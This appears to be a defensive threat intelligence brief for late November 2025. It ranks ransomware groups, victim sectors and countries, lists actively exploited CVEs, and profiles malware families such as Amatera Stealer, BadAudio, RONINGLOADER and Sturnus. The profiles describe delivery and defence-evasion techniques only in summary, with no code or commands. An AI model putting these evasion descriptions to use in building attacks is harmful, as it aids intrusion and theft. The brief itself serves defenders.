Executive Summary
Qilin leads ransomware activity this period, with CL0P and Akira close behind. Newer and mid-tier groups like Sinobi and DragonForce show rising impact. Victims are primarily small US-based businesses, with manufacturing, technology, retail, and construction most affected.
Report Links
Download Threat Brief For November 16-30 2025
Byer-Nichols Threat Brief Podcast 11-30-2025
Ransomware Actors
| Ransomware | Percentage | Last Period | Two Ago |
|---|---|---|---|
| Qilin | 19.74% | 1 | 1 |
| CL0P | 17.11% | 5 | 4 |
| Akira | 16.84% | 2 | 2 |
| Sinobi | 4.74% | 16 | 3 |
| DragonForce | 4.74% | 13 | 10 |
Qilin leads activity, with CL0P and Akira remaining major threats. Manufacturing, tech, retail, and construction top victim sectors, with small US-based businesses hit hardest. Canada rises in activity; Thailand and Germany appear as new hotspots.
Victim Sector
| Sector | Percentage | Last Period | Movement |
|---|---|---|---|
| manufacturing | 19.47% | 1 | Unchanged |
| technology | 13.95% | 2 | Unchanged |
| retail | 13.16% | 5 | 5 -> 3 |
| construction | 12.37% | 4 | Unchanged |
| financial-services | 10.53% | 3 | 3 -> 5 |
Victim Location
| Victim | Percentage | Last Period | Movement |
|---|---|---|---|
| USA | 56.58% | 1 | Unchanged |
| Canada | 7.37% | 5 | 5 -> 2 |
| Thailand | 2.63% | New | |
| Germany | 2.63% | New | |
| UK | 2.11% | 3 | 3 -> 5 |
Victim Org Size
| Size | Percentage | Last Period |
|---|---|---|
| Small Business (500 or less) | 72.30% | 70.03% |
| Mid-Market (501-5000) | 16.62% | 19.58% |
| Large Enterprise (5000+) | 11.08% | 10.39% |
Trending Adversaries
Trending adversaries blend state-aligned and criminal operations, spanning espionage, sabotage, and financial intrusion. Groups active this period show growing geopolitical alignment and disruptive capability, reinforcing the need to track how quickly these actors pivot between intelligence collection and monetization.
- APT24
- Autumn Dragon
- Bloody Wolf
- Dragon Breath
- PlushDaemon
- TridentLocker
Trending & Actively Exploited Vulnerabilities
This period’s trending adversaries span both state-aligned and criminal groups. Their activity reflects a mix of espionage, disruption, and financially motivated intrusions, highlighting how these actors rapidly shift between intelligence gathering and monetization.
| CVE | Vendor | Product |
|---|---|---|
| CVE-2021-26829 | OpenPLC | ScadaBR |
| CVE-2025-13223 | Chromium V8 | |
| CVE-2025-40601 | SonicWall | SonicOS SSLVPN |
| CVE-2025-50165 | Microsoft | Windows Graphics Component |
| CVE-2025-58034 | Fortinet | FortiWeb |
| CVE-2025-61757 | Oracle | Fusion Middleware |
| CVE-2025-64459 | Django Project | Django |
| CVE-2025-64755 | Anthropic | Code AI |
| CVE-2025-8088 | RARLAB | WinRar |
| CVE-2025-9501 | BoldGrid | W3 Total Cache WordPress plugin |
Trending Malware
| Trending Malware | Details |
|---|---|
| Amatera Stealer | Amatera Stealer is an advanced evolution of the ACR Stealer delivered as Malware-as-a-Service, designed to evade modern monitoring and defense mechanisms while stealing highly sensitive data. It spreads mainly through compromised websites that use deceptive CAPTCHA-style social engineering to trick users into executing hidden PowerShell commands, which silently download the malware. Its infection chain relies on multi-stage, heavily obfuscated scripts and legitimate processes, making detection and forensic analysis difficult. |
| BadAudio | BADAUDIO is a C++ first-stage downloader that retrieves, decrypts, and executes AES-encrypted payloads—such as Cobalt Strike Beacon—from a hard-coded C2 server. It collects basic host details, encrypts them with a built-in AES key, and embeds this data in a cookie within its C2 request to quietly identify infected systems. The malware employs control-flow flattening, a sophisticated obfuscation technique that breaks normal program logic to hinder automated and manual reverse-engineering. It is typically delivered as a malicious DLL using DLL search-order hijacking, supported by VBS, BAT, and LNK files that automate placement, persistence, and sideloading through legitimate executables. This multi-layered, stealth-focused execution chain minimizes obvious indicators of compromise and complicates detection. |
| RondoDox | RondoDox is a stealthy botnet campaign that compromises internet-facing routers, DVRs, CCTV systems, and other network devices by exploiting multiple long-standing command-injection vulnerabilities. Initially focused on TBK DVRs and Four-Faith routers via CVE-2024-3721 and CVE-2024-12856, it has since expanded into a broader, multi-vector operation. The malware now leverages a “loader-as-a-service” model, bundling RondoDox with Mirai and Morte payloads to increase reach and persistence. Its tooling continues to grow, incorporating additional CVEs—including several now listed in CISA’s KEV catalog—making exploitation faster and patching more urgent. Overall, RondoDox represents an evolving, multi-architecture loader ecosystem targeting a wide range of vulnerable edge devices. |
| RONINGLOADER | RONINGLOADER is a multi-stage malware loader used by the Dragon Breath (APT-Q-27) group, delivered through trojanized NSIS installers impersonating legitimate apps like Google Chrome and Microsoft Teams. The loader incorporates numerous evasion techniques specifically tailored to bypass popular Chinese endpoint security products, including abusing Protected Process Light (PPL) to disable Microsoft Defender and deploying a valid signed kernel driver to terminate security processes. It also applies custom WDAC policies to block tools such as 360 Total Security and Huorong, and uses phantom DLLs plus thread-pool–based payload injection to further neutralize defenses. The campaign targets Chinese-speaking users and represents an evolution of earlier DragonBreath activity, culminating in the delivery of a slightly updated gh0st RAT variant. Overall, RoningLoader demonstrates a highly resilient and defense-aware approach to gaining and maintaining system access. |
| ShadowV2 | ShadowV2 is a sophisticated malware campaign that hijacks exposed Docker daemons, mainly on AWS EC2, using a Python-based spreader and multi-stage container deployment. It relies on a GitHub CodeSpaces-hosted C2 framework and a Go-based RAT to execute commands and maintain communication. What makes it stand out is its advanced DDoS toolkit, including HTTP/2 rapid reset and Cloudflare bypass techniques, which mimic a “DDoS-as-a-service” platform. The risk it poses is enabling attackers to launch large-scale, cloud-native denial-of-service attacks that can overwhelm business infrastructure and disrupt operations. |
| Sturnus | Sturnus is a newly discovered Android banking Trojan that tricks users by mimicking legitimate financial apps and stealing sensitive data. It abuses Accessibility Services to capture screens, bypasses messaging protections, and uses fake overlays to harvest login credentials. With keylogging, screen recording, and remote-control features, attackers can secretly access accounts and even initiate fraudulent transactions. |
Top News
- Azure hit by 15 Tbps DDoS attack using 500,000 IP addresses
- California man admits to laundering crypto stolen in $230M heist
- Cloudflare hit by outage affecting global network services, points to database issue
- Code beautifiers expose credentials from financial, government and technology organizations
- Crypto mixer founders sent to prison for laundering over $237 million
- Cybercriminals stole $262M by impersonating bank support teams
- New WrtHug campaign hijacks thousands of end-of-life ASUS routers
- Russian bulletproof hosting provider sanctioned over ransomware ties
Contributors
Written by Jeremy Nichols, former Director Of The Global Threat Intelligence Center
Executive Summaries & Adversary Bio’s by Geoff Rehmet, Cybersecurity Expert
Produced & Distributed By Byer Co Cybersecurity Marketing Division (aka Phish Tank Digital)
Want more of these reports? Get them straight to your inbox.